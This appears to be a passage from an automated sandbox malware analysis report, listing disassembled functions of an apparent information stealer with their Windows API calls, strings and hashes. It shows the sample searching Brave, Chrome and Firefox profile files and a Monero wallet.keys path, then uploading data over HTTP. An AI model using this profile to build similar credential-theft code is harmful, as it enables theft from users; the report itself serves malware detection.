Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 888b91a92558336ad68abc952060fcb2e2996bf06185d50c307e679e0645aa6a
Instruction ID: 346c802a50ebc4eaa802abad9192678e88b7726a2a9d5ea4f6a941089c0e795a
Opcode Fuzzy Hash: 888b91a92558336ad68abc952060fcb2e2996bf06185d50c307e679e0645aa6a
Instruction Fuzzy Hash: 34426272900104ABDF58FBA4DD96EEE7378FB55300F408568B906D6981EF34AB49CB93

Function 008A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 008A492C
FindFirstFileA.KERNEL32(?,?), ref: 008A4943
StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
FindClose.KERNEL32(000000FF), ref: 008A4B92

Strings

%s\*, xrefs: 008A4920
%s\%s, xrefs: 008A49FB
%s\%s, xrefs: 008A49A4

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 3520af8cd6a6fe5b5aa017bbfe83b58ec20151092a7ee5e201994cc6d200293d
Instruction ID: 898faa0ff02c18db21d3ee58c09850b54b51522ddda78f28e4200827041c3b8f
Opcode Fuzzy Hash: 3520af8cd6a6fe5b5aa017bbfe83b58ec20151092a7ee5e201994cc6d200293d
Instruction Fuzzy Hash: 246154B1900218ABDF24EBE4DC45EEA737CFB59700F048589B50AD6141EB74DB45CF92

Function 00894880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00894915
StrCmpCA.SHLWAPI(?,0142E808), ref: 0089493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00894ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008B0DDB,00000000,?,?,00000000,?,",00000000,?,0142E758), ref: 00894DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00894E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00894E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00894E49
InternetCloseHandle.WININET(00000000), ref: 00894EAD
InternetCloseHandle.WININET(00000000), ref: 00894EC5
HttpOpenRequestA.WININET(00000000,0142E888,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 00894B15

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

InternetCloseHandle.WININET(00000000), ref: 00894ECF

Strings

------, xrefs: 00894C69
", xrefs: 00894D33
------, xrefs: 008949BD
------, xrefs: 00894B28
", xrefs: 00894BF2

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 19911f7e5e37e3e36ff0fcd6143bb3efe1db34675abb595fccc8f5325b370f87
Instruction ID: 4c2a1b64032e5b964e2816c8cb04e49d1ab9293029c20851c9fee46f31c220d1
Opcode Fuzzy Hash: 19911f7e5e37e3e36ff0fcd6143bb3efe1db34675abb595fccc8f5325b370f87
Instruction Fuzzy Hash: 88120D719101189AEB58EB94DC92FEEB778FF15300F5441A9B107A2891EF742F4ACF62

Function 008A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008A3EC3
FindFirstFileA.KERNEL32(?,?), ref: 008A3EDA
StrCmpCA.SHLWAPI(?,008B0FAC), ref: 008A3F08
StrCmpCA.SHLWAPI(?,008B0FB0), ref: 008A3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 008A406C
FindClose.KERNEL32(000000FF), ref: 008A4081

Strings

%s\%s, xrefs: 008A3EB7

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 673435004056c6b8748a95aff2a7f1e5ad735a9014f43a99022f7071703e3dec
Instruction ID: e9cfd1b751aebb339dfecef48af5f57688d590cf7ea3facee0456af96819be12
Opcode Fuzzy Hash: 673435004056c6b8748a95aff2a7f1e5ad735a9014f43a99022f7071703e3dec
Instruction Fuzzy Hash: 305164B2900218ABDB24EBF4DC85EEE737CFB54300F044589B65AD6140EB759B86CF62

Function 0089F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B15B8,008B0D96), ref: 0089F71E
StrCmpCA.SHLWAPI(?,008B15BC), ref: 0089F76F
StrCmpCA.SHLWAPI(?,008B15C0), ref: 0089F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0089FAB1
FindClose.KERNEL32(000000FF), ref: 0089FAC3

Strings

prefs.js, xrefs: 0089F812

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: aa20877775a6d453a5d61ead1b0907f0c478eff51d1415dcd68a75a7e92768f5
Instruction ID: 8a7524556c8475b213d159b2d89ed6db815d1c3c32223c8504cf3d642e30254f
Opcode Fuzzy Hash: aa20877775a6d453a5d61ead1b0907f0c478eff51d1415dcd68a75a7e92768f5
Instruction Fuzzy Hash: 5FB162719001189BDF68FF68DC95AEE7378FF55300F4081A8A50AD6982EF346B49CB93

Function 008916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B510C,?,?,?,008B51B4,?,?,00000000,?,00000000), ref: 00891923
StrCmpCA.SHLWAPI(?,008B525C), ref: 00891973
StrCmpCA.SHLWAPI(?,008B5304), ref: 00891989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00891D40
DeleteFileA.KERNEL32(00000000), ref: 00891DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00891E20
FindClose.KERNEL32(000000FF), ref: 00891E32

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Strings

\*.*, xrefs: 008917F1

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: b56698465cef78e31c3f2e957da640246b3c178919b23092e46c7e06e9f282c9
Instruction ID: 1fbbebeabbe0a35ef1ef4df6a73d16f7a7973fcf6522905f565fc1eb0b19b01a
Opcode Fuzzy Hash: b56698465cef78e31c3f2e957da640246b3c178919b23092e46c7e06e9f282c9
Instruction Fuzzy Hash: 7D125F719101189BEF59FB64CC96AEE7338FF15300F4441A9A106E2991EF386F89CF92

Function 0089DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008B14B0,008B0C2A), ref: 0089DAEB
StrCmpCA.SHLWAPI(?,008B14B4), ref: 0089DB33
StrCmpCA.SHLWAPI(?,008B14B8), ref: 0089DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0089DDCC
FindClose.KERNEL32(000000FF), ref: 0089DDDE

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

